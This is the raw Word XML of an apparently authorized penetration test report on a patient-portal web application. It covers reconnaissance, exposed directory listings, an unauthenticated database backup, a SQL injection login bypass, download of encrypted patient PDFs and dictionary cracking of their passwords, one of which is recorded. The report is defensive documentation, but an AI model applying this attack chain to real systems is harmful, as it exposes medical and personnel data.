              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Stage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Resolve the hostname, inspect public HTML, robots.txt and sitemap, and enumerate services.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Public target and restricted application paths identified.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Browse directory indexes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/old/, /patient/ and /staff/ expose files and endpoint names.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Independent data exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Request the known backup filename.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Internal HR/shareholder database backup retrieved without authentication.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Authentication testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Send a normal invalid login and capture the baseline.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HTTP 200 with no portal redirect.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SQLi validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Change only the username to the controlled SQL syntax.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HTTP 302 redirect to /patient/portal.php.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Portal confirmation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Open the redirected portal and inspect HTML.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Three report objects and download endpoints identified.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Sensitive object retrieval</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Request report IDs 1–3 with the authenticated session.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Three encrypted PDFs returned with HTTP 200.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Offline document analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Inspect PDF security parameters and extract crackable hashes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>V=2/R=3 legacy PDF encryption parameters recorded.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Password recovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Use dictionary-based PDF password recovery.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>All three passwords recovered; decrypted files validated.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Impact analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Correlate patient-report exposure with independent HR/shareholder backup exposure.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Two independent sensitive-data paths from an unauthenticated starting position.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>22. Milestone 1 — Initial Access &amp; Patient Reports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The patient login form was the primary initial-access boundary. The baseline request established normal application behavior. The controlled SQL syntax test altered the response to an HTTP 302 redirect into the portal. Browser confirmation removed ambiguity about whether the redirect represented a genuine authenticated state.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Report retrieval evidence</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7365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Artifact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HTTP status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Content type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>patient_report_1.pdf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>200</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3,657 bytes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>application/pdf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>patient_report_2.pdf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>200</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3,611 bytes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>application/pdf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>patient_report_3.pdf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>200</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3,735 bytes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>application/pdf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>23. Milestone 2 — Cryptographic Analysis &amp; Password Recovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>All three retrieved PDFs were version 1.4, one page each, and protected by the PDF Standard security handler. qpdf reported V=2, R=3 and 128-bit encryption. The supplied John the Ripper build did not load the extracted PDF hashes with the requested format, so the workflow was not falsely reported as successful through John. pdfcrack was then used for the authorized document-recovery objective and successfully recovered all three passwords.</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7365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Report</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PDF security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Recovered password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>V=2 / R=3 / 128-bit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>123456</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Decrypted; qpdf check clean</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
